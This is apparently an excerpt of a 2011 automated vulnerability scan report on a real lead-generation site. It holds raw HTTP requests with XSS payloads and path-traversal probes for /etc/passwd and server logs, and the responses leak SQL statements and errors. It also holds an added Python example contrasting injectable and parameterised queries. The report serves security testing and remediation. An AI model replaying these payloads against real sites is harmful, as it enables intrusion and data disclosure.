OAVARS[../../../../../../../../../../../etc/passwd\0avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; 
OAVARS[avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x000352))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[avw.php\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Wed, 20 Apr 2011 02:23:55 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=vnt298qjd8b5jjoo74ilifspo7; path=/
Content-Length: 2953
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/inco00/'"--></style></script><script>netsparker(0x0005BB)</script>' OR prj.project_page_url = 'leadflow/inco00/'"--></style></script><script>netsparker(0x0005BB)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_two_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/inco00/'"--></style></script><script>netsparker(0x0005BB)</script>' OR prj.project_page_url = 'leadflow/inco00/'"--></style></script><script>netsparker(0x0005BB)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_dynamic_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/inco00/'"--></style></script><script>netsparker(0x0005BB)</script>' OR prj.project_page_url = 'leadflow/inco00/'"--></style></script><script>netsparker(0x0005BB)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_video_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 
'leadflow/inco00/'"--></style></script><script>netsparker(0x0005BB)</script>' OR prj.project_page_url = 'leadflow/inco00/'"--></style></script><script>netsparker(0x0005BB)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_mobile_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/inco00/'"--></style></script><script>netsparker(0x0005BB)</script>' OR prj.project_page_url = 'leadflow/inco00/'"--></style></script><script>netsparker(0x0005BB)</script>/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '></style></script><script>netsparker(0x0005BB)</script>/' union select prj.catI' at line 5
- /ppc/leadflow/inco00/project.php

/ppc/leadflow/inco00/project.php CONFIRMED

http://www.insideup.com/ppc/leadflow/inco00/project.php?catId=60003&iusrc=iupsc&nsextt='%22--%3E%3C/..

Parameters

Parameter Type Value
catId GET 60003
iusrc GET iupsc
nsextt GET '"--></style></script><script>alert(0x0005C0)</script>

Request

GET /ppc/leadflow/inco00/project.php?catId=60003&iusrc=iupsc&nsextt='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0005C0)%3C/script%3E HTTP/1.1
Referer: http://www.insideup.com/selectvendors.html
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x0002ED)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error_log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache2/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x000308]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; 
OAVARS[../../../../../../../../../../proc/self/version]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../proc/self/version\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x000323)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x000332)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; 
OAVARS[avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x000352))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[avw.php\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Wed, 20 Apr 2011 02:24:24 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=33lfmojg2mv1p3bng64cuc3ae3; path=/
Content-Length: 3383
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/inco00/project.php?catId=60003&iusrc=iupsc&nsextt='"--></style></script><script>netsparker(0x0005C0)</script>' OR prj.project_page_url = 'leadflow/inco00/project.php?catId=60003&iusrc=iupsc&nsextt='"--></style></script><script>netsparker(0x0005C0)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_two_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/inco00/project.php?catId=60003&iusrc=iupsc&nsextt='"--></style></script><script>netsparker(0x0005C0)</script>' OR prj.project_page_url = 'leadflow/inco00/project.php?catId=60003&iusrc=iupsc&nsextt='"--></style></script><script>netsparker(0x0005C0)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_dynamic_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/inco00/project.php?catId=60003&iusrc=iupsc&nsextt='"--></style></script><script>netsparker(0x0005C0)</script>' OR prj.project_page_url = 'leadflow/inco00/project.php?catId=60003&iusrc=iupsc&nsextt='"--></style></script><script>netsparker(0x0005C0)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_video_pages_details prj left join 
sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/inco00/project.php?catId=60003&iusrc=iupsc&nsextt='"--></style></script><script>netsparker(0x0005C0)</script>' OR prj.project_page_url = 'leadflow/inco00/project.php?catId=60003&iusrc=iupsc&nsextt='"--></style></script><script>netsparker(0x0005C0)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_mobile_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/inco00/project.php?catId=60003&iusrc=iupsc&nsextt='"--></style></script><script>netsparker(0x0005C0)</script>' OR prj.project_page_url = 'leadflow/inco00/project.php?catId=60003&iusrc=iupsc&nsextt='"--></style></script><script>netsparker(0x0005C0)</script>/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '></style></script><script>netsparker(0x0005C0)</script>/' union select prj.catI' at line 5
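The leaked statements show exactly where the input goes: the request path after /ppc/, query string included, is pasted verbatim into prj.project_page_url = '...' twice per table (as-is and with a trailing slash) across five UNIONed lead_flow_*_pages_details tables, and the leading single quote of the payload closes that literal, which is why MySQL reports the error "at line 5". The example below is added here and is not the site's code: it rebuilds that statement shape over an in-memory SQLite database (an assumed stand-in schema, so the error text is SQLite's rather than MySQL's) and contrasts the string-built query with the same query using bound parameters. The payload is the one from the URI-based finding above (marker 0x0005BB).

```python
import sqlite3

# Payload exactly as sent in the URI-based finding for /ppc/leadflow/inco00/
# (marker 0x0005BB), URL-decoded the way the application saw it.
PAYLOAD = "'\"--></style></script><script>netsparker(0x0005BB)</script>"
BENIGN_URL = "leadflow/inco00/project.php?catId=60003&iusrc=iupsc"

# The five tables named in the leaked statement. Columns are reduced to those
# the query selects; the joins to sub_category, lead_flow_template and
# lead_flow_group play no part in the bug and are left out (assumed schema).
TABLES = [
    "lead_flow_one_pages_details",
    "lead_flow_two_pages_details",
    "lead_flow_dynamic_pages_details",
    "lead_flow_video_pages_details",
    "lead_flow_mobile_pages_details",
]


def open_db():
    """In-memory SQLite stand-in for the site's MySQL schema (assumed, not real)."""
    conn = sqlite3.connect(":memory:")
    for table in TABLES:
        conn.execute(
            f"create table {table} "
            "(catId integer, groupId integer, templateId integer, project_page_url text)"
        )
    conn.execute(
        "insert into lead_flow_one_pages_details values (60003, 1, 1, ?)", (BENIGN_URL,)
    )
    return conn


def vulnerable_lookup(conn, page_url):
    """Statement shape inferred from the response: one SELECT per table, UNIONed,
    with the request URI pasted into a quoted literal twice (as-is and with '/')."""
    selects = [
        f"select catId, groupId, templateId, project_page_url from {table} "
        f"where project_page_url = '{page_url}' or project_page_url = '{page_url}/'"
        for table in TABLES
    ]
    return conn.execute(" union ".join(selects)).fetchall()


def safe_lookup(conn, page_url):
    """Same statement with bound parameters; the URI can no longer close the literal."""
    selects = [
        f"select catId, groupId, templateId, project_page_url from {table} "
        "where project_page_url = ? or project_page_url = ?"
        for table in TABLES
    ]
    params = [page_url, page_url + "/"] * len(TABLES)
    return conn.execute(" union ".join(selects), params).fetchall()


def run_vulnerable(page_url):
    """Return ('ok', rows) or ('error', message) for the string-built query.
    The live site wrote the statement and the driver's message into a 200 OK
    HTML body; that echo is what made confirmation trivial for the scanner."""
    conn = open_db()
    try:
        return ("ok", vulnerable_lookup(conn, page_url))
    except sqlite3.Error as exc:
        return ("error", str(exc))
    finally:
        conn.close()


def run_safe(page_url):
    """Return ('ok', rows) for the parameterised query; the payload is just data."""
    conn = open_db()
    try:
        return ("ok", safe_lookup(conn, page_url))
    finally:
        conn.close()


if __name__ == "__main__":
    print(run_vulnerable(BENIGN_URL))
    print(run_vulnerable("leadflow/inco00/" + PAYLOAD))
    print(run_safe("leadflow/inco00/" + PAYLOAD))
```

Binding the parameters removes the injection, but the response bodies above show a second defect the fix has to cover as well: the application wrote the failed statement and the database error into a 200 OK page. Log those server-side and return a generic error, otherwise every future query bug becomes a schema disclosure.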
- /ppc/leadflow/inco00/project.php'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0005C2)%3C/script%3E

/ppc/leadflow/inco00/project.php'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0005C2)%3C/script%3E CONFIRMED

http://www.insideup.com/ppc/leadflow/inco00/project.php'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3..

Parameters

Parameter Type Value
catId GET 60003
iusrc GET iupsc
URI-BASED Raw URI '"--></style></script><script>alert(0x0005C2)</script>

Request

GET /ppc/leadflow/inco00/project.php'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0005C2)%3C/script%3E HTTP/1.1
Referer: http://www.insideup.com/selectvendors.html
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x0002ED)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error_log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache2/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x000308]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; 
OAVARS[../../../../../../../../../../proc/self/version]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../proc/self/version\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x000323)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x000332)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; 
OAVARS[avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x000352))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[avw.php\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Wed, 20 Apr 2011 02:24:27 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=cbogjid19r0l255t1l2c6mn482; path=/
Content-Length: 3063
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/inco00/project.php'"--></style></script><script>netsparker(0x0005C2)</script>' OR prj.project_page_url = 'leadflow/inco00/project.php'"--></style></script><script>netsparker(0x0005C2)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_two_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/inco00/project.php'"--></style></script><script>netsparker(0x0005C2)</script>' OR prj.project_page_url = 'leadflow/inco00/project.php'"--></style></script><script>netsparker(0x0005C2)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_dynamic_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/inco00/project.php'"--></style></script><script>netsparker(0x0005C2)</script>' OR prj.project_page_url = 'leadflow/inco00/project.php'"--></style></script><script>netsparker(0x0005C2)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_video_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where 
prj.project_page_url = 'leadflow/inco00/project.php'"--></style></script><script>netsparker(0x0005C2)</script>' OR prj.project_page_url = 'leadflow/inco00/project.php'"--></style></script><script>netsparker(0x0005C2)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_mobile_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/inco00/project.php'"--></style></script><script>netsparker(0x0005C2)</script>' OR prj.project_page_url = 'leadflow/inco00/project.php'"--></style></script><script>netsparker(0x0005C2)</script>/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '></style></script><script>netsparker(0x0005C2)</script>/' union select prj.catI' at line 5
- /ppc/leadflow/inco00/project.php

/ppc/leadflow/inco00/project.php CONFIRMED

http://www.insideup.com/ppc/leadflow/inco00/project.php?'"--></style></script><script>alert(0x0005C4..

Parameters

Parameter Type Value
catId GET 60003
iusrc GET iupsc
Query Based QUERYSTRING '"--></style></script><script>alert(0x0005C4)</script>

Request

GET /ppc/leadflow/inco00/project.php?'"--></style></script><script>netsparker(0x0005C4)</script> HTTP/1.1
Referer: http://www.insideup.com/selectvendors.html
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.insideup.com
